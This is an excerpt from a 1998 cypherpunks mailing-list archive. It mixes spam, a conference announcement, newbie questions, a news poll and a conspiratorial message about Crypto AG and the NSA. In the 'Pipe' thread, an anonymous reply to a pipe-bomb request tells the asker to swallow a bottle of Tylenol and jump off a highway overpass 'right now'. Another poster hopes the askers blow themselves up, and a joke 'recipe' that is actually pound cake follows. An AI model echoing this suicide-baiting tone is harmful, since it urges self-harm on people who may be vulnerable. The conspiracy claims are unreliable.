b3V0aCBLb3JlYSwgb25lCm9mIEtvcmVhJ3MgdGhyZWUgd2lyZWxlc3MgcGhv
bmUgY29tcGFuaWVzLiBCZWxsIENhbmFkYSwgd2hpY2ggaXMgNzUgcGVyY2Vu
dApvd25lZCBieSBCQ0UsIHdpbGwgYWNxdWlyZSBhIDIzLjYgcGVyY2VudCBz
dGFrZSBpbiB0aGUgSGFuc29sIFBhcGVyLWxlZApjb21wYW55LCB3aGlsZSBB
SUcgd2lsbCB0YWtlIGNvbnRyb2wgb2YgMTUuOCBwZXJjZW50LiBCZWxsIENh
bmFkYSBhbmQgQUlHLAp3aGljaCB1c2VkIGludmVzdG1lbnQgZnVuZHMgdG8g
cHVyY2hhc2UgdGhlIHNoYXJlcywgcGFpZCAkMTU5IG1pbGxpb24gYW5kCiQx
MDYgbWlsbGlvbiwgcmVzcGVjdGl2ZWx5LiAoPEEgSFJFRj0iaHR0cDovL3d3
dy5rb3JlYWhlcmFsZC5jby5rci9raDA4MTkvbTA4MTliMDguaHRtbCI+S09S
RUEKSEVSQUxEPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5Gb3IgYWRkaXRp
b25hbCBuZXdzIGFib3V0CnRoZSB3aXJlbGVzcyBpbmR1c3RyeS0taW5jbHVk
aW5nIHBlcmlvZGljIG5ld3MgdXBkYXRlcyB0aHJvdWdob3V0IHRoZSBkYXkt
LXZpc2l0CjxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPmh0dHA6
Ly93d3cud293LWNvbS5jb20uPC9BPjwvRk9OVD48L0ZPTlQ+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRI
PSIxMDAlIj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0la
RT0tMT5DVElBIERhaWx5IE5ld3MgZnJvbSBXT1ctQ09NCmlzIHRyYW5zbWl0
dGVkIHdlZWtkYXlzLCBleGNlcHQgZm9yIGhvbGlkYXlzLiBWaXNpdCB1cyBv
biB0aGUgV29ybGQgV2lkZQpXZWIgYXQgPEEgSFJFRj0iaHR0cDovL3d3dy53
b3ctY29tLmNvbS9wcm9mZXNzaW9uYWwiPmh0dHA6Ly93d3cud293LWNvbS5j
b20vcHJvZmVzc2lvbmFsPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZuYnNw
OwoKPFA+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PS0xPklmIHlvdSBhcmUgbm90IGludGVyZXN0ZWQKaW4gcmVjZWl2aW5nIHRo
ZSBDVElBIERhaWx5IE5ld3MgZnJvbSBXT1ctQ09NLCBwbGVhc2Ugc2VuZCBh
IG1lc3NhZ2UgdG8KPEEgSFJFRj0ibWFpbHRvOnVuam9pbi1DVElBX0RhaWx5
X05ld3NAdW0yLnVuaXR5bWFpbC5jb20iPnVuam9pbi1DVElBX0RhaWx5X05l
d3NAdW0yLnVuaXR5bWFpbC5jb208L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+
Jm5ic3A7Cgo8UD48Qj4qKio8Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9LTE+IFRoZSB0ZXJtICJ1bmpvaW4tQ1RJQV9EYWlseV9O
ZXdzQHVtMi51bml0eW1haWwuY29tIgptdXN0IGJlIGxpc3RlZCBpbiB0aGUg
VE8gc2VjdGlvbiBvZiB0aGUgZW1haWwuPC9GT05UPjwvRk9OVD4gKioqPC9C
PiZuYnNwOwoKPFA+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBTSVpFPS0xPlBsZWFzZSBOb3RlOiBTb21lIG9mIHRoZQpsaW5rcyBpbiB0
b2RheSdzIG5ld3MgYXJlIHRpbWUgc2Vuc2l0aXZlLiZuYnNwOyBUaG9zZSBs
aW5rcyBtYXkgbm90IGJlCmF2YWlsYWJsZSBhcyBuZXdzIGNoYW5nZXMgdGhy
b3VnaG91dCB0aGUgZGF5LiZuYnNwOyBBbHNvLCBzb21lIG5ld3Mgc291cmNl
cwptYXkgYmUgc3Vic2NyaXB0aW9uLWJhc2VkIG9yIHJlcXVpcmUgcmVnaXN0
cmF0aW9uLjwvRk9OVD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+CjwvVEFCTEU+CiZuYnNwOzwvY2VudGVyPgo8L0JP
RFk+CjwvSFRNTD4K
--Boundary..3995.1071713795.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FTPPork@aol.com
Date: Thu, 20 Aug 1998 23:32:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Pipe
Message-ID: <b2769a39.35dc90b8@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-08-19 21:40:51 EDT, tcmay@got.net writes:

<< Hoppyhead,
 
 You'll have to wait until we supply the other AOLholes with the information
 they demanded on thrash music, hacking banks info, LSD manufacturing, and
 get rich quick schemes.
 
 We're struggling under the workload of millions of new AOL, PacBell,
 Earthlink, Prodigy, and other newbies who have just discovered the Net.
 
 
 --Tim May
  >>
I take that statement as an insult, and it really isn't true about all of us
AOL users.  Of course, Hoppy was kinda stupid for asking something that
stupid, but we don't all care about thrash music, hacking banks info, LSD
manufacturing, and
 get rich quick schemes.  Actually, some of us know what real hacking is...
not just using scrolling programs and cracking banks (Both of which are
completely different) etc...

Anyway, try not to stereotype people so much, because, with the Advent of 32
bit AOL, we can actually use all of the TCP/IP protocols, etc...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Fri, 21 Aug 1998 03:06:38 -0700 (PDT)
To: Anonymous <nobody@replay.com>
Subject: QUestion....
In-Reply-To: <199808031315.PAA15001@replay.com>
Message-ID: <Pine.GSO.3.96.980820171333.20689A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


Are there only two techniques in encrypting a data?
(transposition and substitution?)


Could you give me one algorithm better than DES and RSA?



Thank you.



It's me Bernie.






===============================================================================
It's funny, I have always been a good 
	listener who understood and cared
		someones secrets, but to my dismay 
			I have never been understood.


metaphone@altavista.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Member Benefits <benefits@biztravel.com>
Date: Fri, 21 Aug 1998 23:05:05 -0700 (PDT)
To: "Biztravel.com Member" <benefits@biztravel.com>
Subject: Biztravel.com $25 Welcome Gift Reminder
Message-ID: <35DC91DF.D158B2C@biztravel.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Biztravel.com Member,

I'd like to remind you that your Biztravel.com
Welcome Gift is waiting for you - when you
purchase your first flight with us we'll send you
a $25 American Express(R) Gift Cheque*!

But you must act quickly - to qualify for this
gift you must purchase your flight by 8/31/98.
So plan ahead and book that upcoming trip now!

++++++   BIZTRAVEL.COM FEATURES  +++++++
With Biztravel.com, you can:
-  purchase airline flights
-  reserve rental cars and hotel rooms
-  view all your flight options according to
   your personalized travel preferences
-  have electronic tickets waiting for you at
   the airport, or get overnight delivery of tickets
-  call our 24-hour-a-day customer service center
   for last minute travel assistance
-  track your frequent flyer account balances
-  have our free paging service, bizAlerts, alert
   you to last-minute flight changes
-  and more!

Thank you for joining us.  And remember, visit
<http://www.biztravel.com> and make your first
flight purchase by 8/31/98 to receive your
FREE $25 American Express Gift Cheque.

Sincerely,
John I. Williams, Jr.
President & CEO
Biztravel.com(R)

P.S.  If you have recently purchased from us, your
gift will be mailed to you after you take your flight.
++++++++++++++++++++++++++++++++++++++++++
*Travel must commence no later than 10/15/98.
Full details regarding this new member offer are
available at http://www.biztravel.com/welcome25b
++++++++++++++++++++++++++++++++++++++++++






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Hirschfeld <R.Hirschfeld@cwi.nl>
Date: Thu, 20 Aug 1998 23:39:43 -0700 (PDT)
To: R.Hirschfeld@cwi.nl
Subject: FC99 Preliminary Announcement
Message-ID: <UTC199808201717.TAA24813.ray@vanity.cwi.nl>
MIME-Version: 1.0
Content-Type: text/plain


Financial Cryptography '99
February 22-25, 1999, Anguilla, BWI
Preliminary Announcement

FC99, the third international conference on financial data security
and digital commerce, will be held in Anguilla, British West Indies.
FC99 aims to bring together persons involved in both the financial and
data security fields to foster cooperation and exchange of ideas.  It
is organized by the International Financial Cryptography Association
(IFCA).

The conference program features regular sessions for refereed papers,
invited talks, panel discussions, and a rump session, covering all
aspects of financial cryptography.  Proceedings of the conference will
be published by Springer-Verlag in their Lecture Notes in Computer
Science (LNCS) series.


INVITED SPEAKER

Prof. Adi Shamir  (Weizmann Institute of Science, Rehovot, Israel)


CONFERENCE VENUE

The conference will be held at Chandeliers, the conference facility of
the InterIsland Hotel, which is centrally located on the island of
Anguilla.


REGISTRATION

For early planning purposes, those wishing to participate in the
conference are requested to register as soon as possible.
Registration can be done via the web at URL http://fc99.ai/.  The fee
for the conference, which covers all conference materials and events
(including preproceedings, final proceedings, attendance at scientific
sessions, and breakfast and lunch each day of the conference), is:

$850 regular registration
$350 academic registration
$150 student registration

An additional $50 fee applies to registrations for which payment is
received after January 1, 1999.

A $100 discount ($50 for academic and student registrations) is
available to participants who pay their registration fee by electronic
money (e.g., DigiCash ecash, NetCash, CyberCash, etc.).  See the web
page for details.

Payment may be made by credit card, bank transfer, electronic money,
or cash.


STIPENDS

A limited number of stipends to help defray the costs of attendance
may be available to full-time students with a paper accepted for
presentation at the conference.  If you would like to apply for a
stipend, please contact the General Chair at the email address listed
below.


WORKSHOP

A workshop, intended for anyone with commercial software development
experience who wants hands-on familiarity with the issues and
technology of financial cryptography, is planned in conjunction with
FC99.  For details, contact Ian Goldberg (iang@cs.berkeley.edu).


HOTEL ACCOMODATION

The conference hotel is not recommended except to those seeking budget
accomodations.  The recommended hotel is Mariners, where a block
reservation has been made.  To reserve a room, please call the hotel
at +1 (809) 497-2671 and mention that you will be attending FC99.
Information about other hotels is available at URL http://fc99.ai.


WELCOME RECEPTION

A welcome reception will be held on Monday, February 22, 1999, the
evening of the first day of the conference.


GENERAL INFORMATION

Visas

Visas are not required for citizens of most American and European
countries.  If you are uncertain about whether you need a visa,
contact the local British consulate for information.

Getting to Anguilla

>From North America, Anguilla is usually reached via San Juan (Puerto
Rico).  From Europe, the best connections are via
St. Maarten/St. Martin (from Amsterdam or Paris), or Antigua (from
London).  St. Martin is very close to Anguilla and is connected by
ferry as well as by plane.

Local Transportation

The simplest way to get around Anguilla is to rent a car.  You will
need to buy an Anguilla drivers license, but this is a formality.
Taxis are also available.  Another possibility is to hitch rides from
local residents, who are eager to provide them and will often stop to
offer rides unsolicited.  Transportation will be provided at specific
times between Mariners and the InterIsland hotel.

Weather

Expect temperatures in the 20's or 30's Celsius, 70's or 80's
Fahrenheit.  There is often a strong wind, with cloudbursts that
quickly blow over.  Dress code for the conference is shorts and
T-shirt.

Money

The local currency is the Eastern Caribbean dollar (EC$), with an
exchange rate of approximately EC$2.7/US$1, but many goods and
services in Anguilla, particularly those aimed primarily at tourists
(such as restaurants and hotels) are priced in US dollars.


PROGRAM COMMITTEE

Joan Feigenbaum, AT&T Labs
Yair Frankel, CertCo
Matthew Franklin, Xerox PARC
David Goldschlag, Divx
Markus Jakobsson, Bell Labs
Ari Juels, RSA Labs
Arjen Lenstra, Citibank
Cliff Neuman, USC
Berry Schoenmakers, Digicash
Jacques Stern, ENS
Yacov Yacobi, Microsoft
Bennet Yee, UCSD

Program Chair:
Matthew Franklin        
email: franklin@parc.xerox.com

A Call for Papers with information about submitting papers and
deadlines for submissions can be found on the web at URL
http://www.rsa.com/rsalabs/fc99.


ORGANIZING COMMITTEE

General Chair:
Rafael Hirschfeld
email: unipay@xs4all.nl

Local Arrangements Chair:
Vincent Cate
email: vince@offshore.com.ai

For further information, please see the main FC99 conference web page
at URL http://fc99.ai/.


SPONSORS

FC99 is sponsored by:

nCipher Corporation <http://www.ncipher.com>
Hansa Bank & Trust Company <http://www.hansa.net/>
Offshore Information Services <http://offshore.com.ai/>

If you are interested in sponsoring FC99, please contact the General
Chair at the email address listed above.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 20 Aug 1998 23:12:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808201720.TAA32169@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


The first step is to swallow an entire bottle of Tylenol.  Then, to be
certain of your resilience (you have to be quite resilient to build a pipe
bomb), find the nearest highway overpass and jump off of it.  These
steps are crucial precursors to building a pipe bomb, and are much
more effective if you carry them out as soon as possible.  Like right
now.

Hope this helps.


At 07:28 PM 8/19/98 -0400, HOPPYF1215@aol.com wrote:
>Send me info on how to make a pipe bomb. HoppyF1315
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: techsupport@vitalsigns.com
Date: Thu, 20 Aug 1998 23:04:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Thank you for downloading NetMedic
Message-ID: <199808210357.UAA16224@vssun.vitalsigns.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for downloading the free trial version of Net.Medic. For the next 30 days, you can test the full retail version by responding to the prompt that appears the first time you attempt to use one of Net.Medic's advanced features. After 30 days, Net.Medic will revert back to the trial version, providing you with a basic feature set that you can use indefinitely. If you'd like to purchase the fully-featured version, please visit the "How to Buy Net.Medic" section on our web site at http://www.vitalsigns.com/buy/nm/index.html to see where the product is available.

Due to the overwhelming popularity of the free download, we regret that VitalSigns cannot offer you any direct technical support or assistance for this version. However, if you do encounter any problems installing or using Net.Medic, there are two key sources of information available to you:

 (1) Extensive on-line help is available from the Net.Medic toolbar by pressing the "Help" button (with the yellow question mark).
 
 (2) The "Technical Support" section on our Web site (http://www.vitalsigns.com/support/index.html) offers additional information, including Frequently Asked Questions, How to Interpret Net.Medic Results, etc.

 When you visit our Web site, and if you're an IT professional, ISP or webmaster, we invite you to check out our family of enterprise management products:

 -- Net.Medic Pro: a powerful diagnostic and monitoring tool that includes all the functionality of Net.Medic, and also lets webmasters continuously monitor the performance of Web servers and modem banks.

 -- VitalAnalysis: the first true intranet manager, measuring performance of intranet applications end to end, from application to wire, from one end of the network to the other, and back again.

 -- VitalHelp: a real-time fault management and remote diagnostic solution that enables help desks to monitor, detect and correct end-user network problems.

Again, thank you for your interest in Net.Medic.
 
 Regards,
 VitalSigns Software






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spazherp@aol.com
Date: Thu, 20 Aug 1998 23:02:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: anarchy cookbook
Message-ID: <1ae240d1.35dcf75c@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Is any one home?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anali <anali@slt.lk>
Date: Thu, 20 Aug 1998 22:54:30 -0700 (PDT)
To: daruma@gte.net
Subject: TRADE
Message-ID: <1.5.4.16.19980820224352.2b979e02@slt.lk>
MIME-Version: 1.0
Content-Type: text/plain


20-08-1998.         


                              LIONES ENTERPRISES
NO-30,SUNETHRADEVI ROAD,KOHUWALA, 
                              P.O.BOX-77 ,NUGEGODA,
                              SRI LANKA.
                              TEL   :0094 1 823464 (5 Lines)
                              FAX   :0094 1 823464
                              TELEX :21213 CE ATTN:LIONES
                              E.MAIL:anali@slt.lk   



DIRECTOR,
TRADE SERVICES,        


DEAR SIR,

WE ARE ONE OF LEADING IMPORT AND EXPORT ORGANIZATION IN
SRI LANKA.WE WISH FORWARD OUR IMPORT AND EXPORT MARKETS INFORMATINS FOR YOUR
REFERENCES.OUR EXPORT/IMPORT COMMDITIES DETAIL GIVEN BELOW:

EXPORT COMMODITIES-
*******************
1.FRESH FRUITS AND VEGETABLES.

2.CEYLON BLACK TEA IN BAGS.

3.CEYLON HERBAL TEA IN PACKETS.(POLPALA /KIDNEY TEA/ COOLING TEA 
  & DIABETES TEA.

4.CEYLON HERBAL PORRIDGE IN CONSUMER PACKETS.(HATHAWARIYA,-
 GOTUKOLA,WEL-PENELA,MUKUNUWENNA & IRAMUSU).

5.CEYLON HERBAL TEA (BLOOD PURIFYING TEA)- TEPHROSIA   PURPUREA,TINOSPORA
CORDIFOLIA,PHYLLANTHUS EMBLICA,-
 EVOLVULUS ALSINOIDES & CASSIA AURICULATA.

6.CEYOLN HERBAL TEA (SLIMMING TEA)-GYRINOPS WALLA,-
 BAUHINIA  VARIEGATE,ATALANTIA MISSIONIS,MINOSA PUDICA- 
 & CALOTROPIS GIGANTEA.
 
7.SPICES (BLACK PEPPER,CARDAMONS,CLOVES,GINGER,MACE,NUTMEG 
  TUMERIC AND CINNAMON).

8.EDIBAL NUTS (CASHEW).

9.FRESH COCONUTS AND DESICCATED COCONUT.

10.FIBER(COIR PRODUCTS)-FIBER MOSSTICK,HUSK CHIPS,COMPRESSED
COCOHUSK,DUST,PEAT.

11.CANNED FOODS (JAM/SAUCE/CORDIAL).

12.CIGARETTE.

13.NARURAL RUBBER.

14.HANDICRAFTS (WOODEN)

15.RICE.

IMPORT COMMODITIES -
*******************

1.CHEESE AND BUTTER.

2.FISH & MEAT PRODUCTS.(TIN OR PACKS)

3.PERFUMES AND GIFT ITEMS.

4.ELECTRIC & ELECTRONIC ITMES.

5.COMPUTER ITEMS.

6.SUGER

7.DHAL ( RED LENTILS )

8.CRUDE OIL.
 
WE ARE THANKING YOU IN ADVANCE FOR YOUR EARLY ATTENTION IN THIS REGARD.


BEST REGARDS,
LIONES ENTERPRISES


DIRECTOR -MARKETING.
                               
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: techsupport@vitalsigns.com
Date: Fri, 21 Aug 1998 05:19:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Thank you for downloading NetMedic
Message-ID: <199808211219.FAA20252@vssun.vitalsigns.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for downloading the free trial version of Net.Medic. For the next 30 days, you can test the full retail version by responding to the prompt that appears the first time you attempt to use one of Net.Medic's advanced features. After 30 days, Net.Medic will revert back to the trial version, providing you with a basic feature set that you can use indefinitely. If you'd like to purchase the fully-featured version, please visit the "How to Buy Net.Medic" section on our web site at http://www.vitalsigns.com/buy/nm/index.html to see where the product is available.

Due to the overwhelming popularity of the free download, we regret that VitalSigns cannot offer you any direct technical support or assistance for this version. However, if you do encounter any problems installing or using Net.Medic, there are two key sources of information available to you:

 (1) Extensive on-line help is available from the Net.Medic toolbar by pressing the "Help" button (with the yellow question mark).
 
 (2) The "Technical Support" section on our Web site (http://www.vitalsigns.com/support/index.html) offers additional information, including Frequently Asked Questions, How to Interpret Net.Medic Results, etc.

 When you visit our Web site, and if you're an IT professional, ISP or webmaster, we invite you to check out our family of enterprise management products:

 -- Net.Medic Pro: a powerful diagnostic and monitoring tool that includes all the functionality of Net.Medic, and also lets webmasters continuously monitor the performance of Web servers and modem banks.

 -- VitalAnalysis: the first true intranet manager, measuring performance of intranet applications end to end, from application to wire, from one end of the network to the other, and back again.

 -- VitalHelp: a real-time fault management and remote diagnostic solution that enables help desks to monitor, detect and correct end-user network problems.

Again, thank you for your interest in Net.Medic.
 
 Regards,
 VitalSigns Software






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 23 Aug 1998 00:00:24 -0700 (PDT)
To: Marc Maffei <marcmf@2xtreme.net>
Subject: Re: Pipe
In-Reply-To: <00b001bdcd89$846d2140$8e2193d0@marcmaff>
Message-ID: <Pine.BSF.3.91.980821054518.23482E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 21 Aug 1998, Marc Maffei wrote:

> please somebody give them the info so that they take themselves out of our
> misery, since obviously they will botch the job and will give us great
> pleasure with all the fireworks.
> 
> >>>Send me info on how to make a pipe bomb. HoppyF1315

OK-

THIS INFORMATION IS PROVIDED FOR EDUCATIONAL USE ONLY! DO NOT TRY THIS AT 
HOME, UNLESS YOU KNOW WHAT YOU ARE DOING!!! BETTER YET, DO NOT ACTUALLY 
USE THESE INSTRUCTIONS, AND BE CAREFUL WHO YOU SHARE THEM WITH! IT IS 
MUCH SAFER IF YOU HAVE STUDIED THIS IN SCHOOL, AND ARE NOT A RANK AMATUER!

Here's something you can make using basic household chemicals, in your
kitchen. Be careful, or you'l make a real mess. You can make several
seperate batches of this, and combine after cooled, but don't try making
larger batches in one pass, as this can get out of hand quickly. (Sorry,
but I don't have the metric conversions for this - you're on your own
there, and this won't really live up to expectations if you use metric 
conversion, anyway ...)

Carefully sift a pound of household flour, gradually combining with 1/2
teaspoon sodium chloride. Be sure that the mixture is uniform, without
clumping.  Aerate until smooth (in a non-reactive vessel, such as a PYREX
bowl) a pound of emulsified milk fat, and gradually add 1 pound of
granulated sucrose (available at the grocer's). Add the yolks from 10
eggs. Use a hand mixer to mix this, and get the mixture as "LITE" as
possible. Sift the sifted flour/sodium chloride mixture in very slowly -
MAKE SURE TO KEEP THE MIXTURE UNIFORM, AND DON'T ALLOW "LUMPS" TO FORM -
IF YOU BEGIN TO SEE THIS, SLOW DOWN THE RATE AT WHICH YOU ARE ADDING THE
BASE flour/Sodium Chloride MIX, AND STIR BETTER! Stir in a teaspoon of
extract of vanilla (CAUTION, THIS CONTAINS ALCOHOL, WHICH IS FLAMMABLE!)
and make sure to distribute evenly throughout the mixture. Add a 1/2
teaspoon of Citric Acid in an aqueous solution. Carefully add the egg
whites, distributing evenly.  Continue to stir this mixture until it
starts to become stiff and hard to stir, but TAKE CARE THAT IT DOES NOT
BEGIN TO BECOME DRY (stop mixing before it reaches this point!).  Use
butter or shortening to grease the inside of two bread loaf pans SO THAT
THE MIXTURE DOES NOT STICK TO THE SIDES OF THE METAL PANS.  Pour half of
the mixture SLOWLY into each pan. Use an oven to "bake" this mixture - let
the oven heat up to 300 degrees (farenheit), then put the pans in. You
will need about 1.25 hours for the heat conversion to occur. Be sure NOT
TO LEAVE THE PANS IN TOO LONG!!! If you see that the mixture is taking on
a "DRY" LOOK, or is "SHRINKING" AWAY FROM THE SIDES OF THE PAN, CAREFULLY
REMOVE AT ONCE!! MAKE SURE TO HANDLE THE PANS WITH PROTECTIVE GLOVES, AS
THEY WILL BE HOT! YOU DON'T WANT TO DROP THIS ON THE FLOOR AT THIS POINT!
Carefully set the pans down (slowly) where the heat from the pans will not
cause damage, and where the pans can be LEFT UNDISTURBED for several
hours. Allow the mixture to cool until the sides and the bottom of the pan
are cool to the touch - at this moint, the mixture will be safe to handle. 

This should make enough to fill several pipes, depending on size. Be very 
careful when packing the mixture into the pipe, and make sure that you 
don't get any of the mixture into the pipe threads, as this can get very 
messy. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <x@x.com>
Date: Fri, 21 Aug 1998 09:13:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: The greatest threat to democracy ...
Message-ID: <3.0.32.19691231160000.0075d564@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


... is not restrictive crypto regulations.
It's Radio Free Disney.


Clinton's Job Approval Rating Up 
Broad Support for Strikes 
By Gary Langer
ABCNEWS Polling Analyst
Aug. 21 - Americans overwhelmingly support
the U.S. strikes against suspected terrorist sites
in Afghanistan and Sudan, and by a 2-1 margin
they reject the suggestion that President Clinton
ordered the attack to divert attention from the
Monica Lewinsky scandal, an ABCNEWS poll
has found. 

Job Approval Up
Eighty percent support the missile attack,
and 64 percent believe Clinton ordered it
"mainly to fight terrorism," not because
he wanted to turn attention away from the Lewinsky case.
Thirty percent subscribe to the "Wag the Dog" theory;
that's been about the size of Clinton's hard-core
detractors since the Lewinsky scandal broke.
        Thursday night's survey found a five-point increase
in Clinton's job
approval rating,
to 65
percent-his
best in ABC polling since early April. And 68 percent say
they trust him to handle the U.S. response to
terrorism-even though, in an ABCNEWS poll
Wednesday night, a record low of 24 percent rated him
as "honest and trustworthy."
        
             Support for the strikes
                 
                                  Yes
                                       No
 Support the missile strike
                                 80% 
                                      14% 
 Trust Clinton to handle terrorism
                                 68% 
                                      28% 
 Approve of Clinton's job performance
                                 65% 
                                      32% 


Will Strikes Reduce Terrorism?
The public divides evenly on whether the missile strikes
will reduce terrorism directed against the United States, or
increase it. Among those who expect the strikes to reduce
terrorism, 98 percent are in support. But even among
those who expect it to increase terrorism, 68 percent
support the U.S. missile strikes nonetheless. Support also
is non-partisan, drawing eight in 10 Democrats,
Republicans and independents alike. 
        Finally, 55 percent said they do think the Lewinsky
matter is interfering with Clinton's ability to serve
effectively as president. But considerably fewer-about
half that number-think it's interfering "a great deal."
        This survey was conducted by telephone Thursday
night among a random national sample of 510 adults. The
results have a margin of error of plus or minus 4.5 points.
Field work by Chilton Research Services of Horsham, Pa.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 21 Aug 1998 11:02:18 -0700 (PDT)
To: senator_bingaman@bingaman.senate.gov
Subject: tape into the mail this afternoon
Message-ID: <35DDB4EB.4A53@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 8/21/98 10:09 AM

Laszlo Baranyi    http://www.qainfo.se/~lb/crypto_ag.htm

Got your letter, postcard, and business card this morning!  THANKS!

Looks like you got.

/\/\/\/\
Tuesday 7/7/98 6:57 PM       
       
Laszlo Baranyi       
       
You DID NOT mention the Swiss radio international radio
broadcasts.       
       
http://www.qainfo.se/~lb/crypto_ag.htm       
       
Send me a snail mail address and I will send you a copy.       
       
Using postcard, of course       
       
 pob 14838       
 abq, nm 87191       
 usa       
       
Gustavus J Simmons       
       
  Cryptanalysis and Protocol Failures       
       
  COMMUNICATIONS OF THE ACM, November 1994, vol 37, no 11, page
56              
The 'spiking' story, in obscure language.       
       
Simmons and R J Hanson
http://sina.tcamc.uh.edu/~haskell/rjh/rjhres.html       
were two of the most responsible people for me coming to Sandia from
Washington State U.       
       
Here are two of my former Ph.D. students in computer science from
wsu.       
       
http://www.mhpcc.edu/general/john.html       
http://www.friction-free-economy.com       
       
NSA employee PAUL BRIDGE in about 1987 told me that Simmons was a       
security risk and that I should not talk to Simmons.       
       
In about 1992 I figured out something was fishy and began to talk to
Simmons again.       
       
Simmons told me that he asked NSA employees Morris and Proto       
       
  1  NSA is sorry it delegated responsibility for implementation       
     of electronic locks in the us nuclear arsenal to Sandia.       
       
  2  NSA wants the business back.       
       
Simmons told me neither Morris or Proto would respond to his
question.       
       
Let's ALL   http://www.wpiran.org/  hope for settlement of this
UNFORTUNATE MESS.       
       
bill       

/\/\/\

I stopped a Target department store and bought 7 Maxell URL 90 tapes.

As I am writing this note to you, I am both listening to the master copy
Hans Buehler sent me
on January 5, 1995.  

I will make a copy of the envelope I received the tape in.

You wrote

  Laszlo Baranyi
  98-08-13 10:15

  To: MIME:billp@mnol.com @ INTERNET
  cc:
  Subject:  Re: going nowhere  

  Best Mr. Bill Payne

  Yes, I am interresting of receiving the tape.
  I have toddy putted a printout of this email into an
  envelope with our company logo, and my bissnescard
  and sent it to your adress below.
 
  I must admit that I do not understand the purpose
  of want a postcard from me, but I guess that you have your
  reasons, and I have no problems to follow your instructions.
  So, the papermail is today sent to you.  If you prefer, I could also
  sent you a PGP-signed request for the broadcast.  Just let me know.

  It guess that it is the single missing reference that remains in order
have
  the whole story of Crypto AG documented.

  My intentions with the tape is to 
  1) make it publicy awalible on Internet, as sound, transcript in
Germany
  I will search for some fluid in German) and a translation to engish.

  2) I will contact Swiss Radio, in order to get as much as possible
verified about
  the tapes authentication.  I would also streangthens the tapes
authentication if I
  have your permission to mentioned that I received it from you.  Is
that OK? 

  >Again, if you don't have     
  > 
  >broadcasts about the Buehler case that were on Swiss Radio 
  > International on May 15, 1994 and     July 18, 1994.     
  > send me a postcard at pob 14838, abq, nm 87191, usa.      
  > I will make a copy and send.
  
  With best regards Laszlo baranyi 
  --- 
   
Let me respond

   I must admit that I do not understand the purpose
   of want a postcard from me, but I guess that you have your
   reasons,

I have not been reading e-mail since about 1 April 1997 when Patty and I
went to Zurich.

PRIMARY REASON is that the US government is a MASTER at messing with
minds.

Here is a reference

        ...  rise of acid fascism in America, including material    
       on Charles Manson, Mel Lyman, Victor Baranco, and their
followers    
       by David Felton    
    
seen at http://www.amazon.com.     

  "The Agency [CIA] is not an intelligence agency.  It is a         
  covert action agency whose role is to overthrow governments.         
  Disinformation is a major part of its covert action role.  The         
  American people are the primary target of its lies."         
         
  - Ralph McGehee, who worked for with the CIA for twenty-five
years         
         
  "Have we gone beyond the bounds of reasonable dishonesty/"         
  A CIA memo         
         
page 55  Wierd History 101  by  John Richard Stephens  
http://www.adamsmedia.com/         

So the idea is that if I do not read what the Great Satan wrote, then
the Great Satan cannot
mess with my mind.

Morales and I BOTH have some interesting stories of when the Great Satan
WAS SUCCESSFUL
